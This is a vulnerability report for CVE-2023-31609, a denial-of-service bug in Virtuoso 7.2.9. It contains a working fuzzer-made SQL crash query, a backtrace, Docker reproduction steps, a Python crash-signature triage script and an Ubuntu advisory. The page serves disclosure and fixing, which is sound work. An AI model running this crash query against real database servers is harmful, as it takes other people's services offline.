CVE-2023-31609: virtuoso 7.2.9 crashed at dfe_unit_col_loci · Issue #1126 · openlink/virtuoso-opensource

An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f VARCHAR(80) );
SELECT case b.d when coalesce((select max(17+coalesce((select max(coalesce((select (select count(distinct case f when 19 then coalesce((select coalesce((select max(11-(abs(d)/abs(11))) from b where not -c in (19,b.d,17)),17) from b where (f in (d,f,b.c))),d) else d end) from b) from b where 17 between e and b.f),b.c)) from b where 13>=e),d)) from b where b.f>b.f),b.d) then 17 else b.f end FROM b WHERE not exists(select 1 from b where 13 between c+17 and (b.id));

backtrace:

#0 0x739343 (dfe_unit_col_loci+0x1393)
#1 0x739030 (dfe_unit_col_loci+0x1080)
#2 0x747e8c (sqlg_top_1+0x7c)
#3 0x70d4d4 (sqlo_top_select+0x164)
#4 0x6b72bf (sql_stmt_comp+0x8bf)
#5 0x6ba122 (sql_compile_1+0x1a62)
#6 0x7c8cd0 (stmt_set_query+0x340)
#7 0x7cabc2 (sf_sql_execute+0x922)
#8 0x7cbf4e (sf_sql_execute_w+0x17e)
#9 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#10 0xe1f01c (future_wrapper+0x3fc)
#11 0xe2691e (_thread_boot+0x11e)
#12 0x7fb2a20b9609 (start_thread+0xd9)
#13 0x7fb2a1e89133 (clone+0x43)

ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9

wait for the server to start

sleep 10

check whether the simple query works

echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

run the poc

docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
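For triage, the backtrace in the report above can be reduced to a crash signature and compared with backtraces from other crashes, to tell whether they hit the same site. This is an added example, not code from the issue or from the Virtuoso project; the `RUNTIME` frame list, the default depth of 3 and the sample trace in the usage note are assumptions.

```python
import re

# Backtrace text as posted in the issue above.
ISSUE_BACKTRACE = (
    "#0 0x739343 (dfe_unit_col_loci+0x1393) #1 0x739030 (dfe_unit_col_loci+0x1080) "
    "#2 0x747e8c (sqlg_top_1+0x7c) #3 0x70d4d4 (sqlo_top_select+0x164) "
    "#4 0x6b72bf (sql_stmt_comp+0x8bf) #5 0x6ba122 (sql_compile_1+0x1a62) "
    "#6 0x7c8cd0 (stmt_set_query+0x340) #7 0x7cabc2 (sf_sql_execute+0x922) "
    "#8 0x7cbf4e (sf_sql_execute_w+0x17e) #9 0x7d4c0d (sf_sql_execute_wrapper+0x3d) "
    "#10 0xe1f01c (future_wrapper+0x3fc) #11 0xe2691e (_thread_boot+0x11e) "
    "#12 0x7fb2a20b9609 (start_thread+0xd9) #13 0x7fb2a1e89133 (clone+0x43)"
)

# One frame: "#<index> 0x<address> (<symbol>+0x<offset>)"
FRAME_RE = re.compile(r"#(\d+)\s+(0x[0-9a-fA-F]+)\s+\(([^+()\s]+)\+(0x[0-9a-fA-F]+)\)")

# Thread start-up / libc frames that say nothing about the SQL engine (assumed list).
RUNTIME = {"future_wrapper", "_thread_boot", "start_thread", "clone"}


def parse_frames(text):
    """Return (index, address, symbol, offset) tuples; frames may be one per
    line or run together on a single line."""
    return [(int(i), int(a, 16), s, int(o, 16)) for i, a, s, o in FRAME_RE.findall(text)]


def signature(text, depth=3):
    """Innermost `depth` engine symbols, with adjacent repeats (recursion)
    collapsed. Addresses and offsets are ignored so that a rebuilt binary
    still yields the same key."""
    sig = []
    for _, _, sym, _ in parse_frames(text):
        if sym in RUNTIME or (sig and sig[-1] == sym):
            continue
        sig.append(sym)
        if len(sig) == depth:
            break
    return tuple(sig)


def same_crash_site(candidate, reference=ISSUE_BACKTRACE, depth=3):
    """True when both backtraces reduce to the same non-empty signature."""
    ref = signature(reference, depth)
    return bool(ref) and signature(candidate, depth) == ref
```

`signature(ISSUE_BACKTRACE)` gives `('dfe_unit_col_loci', 'sqlg_top_1', 'sqlo_top_select')`; a trace whose innermost frame is a different function does not match.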

Related news

Ubuntu Security Notice USN-6832-1

Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.
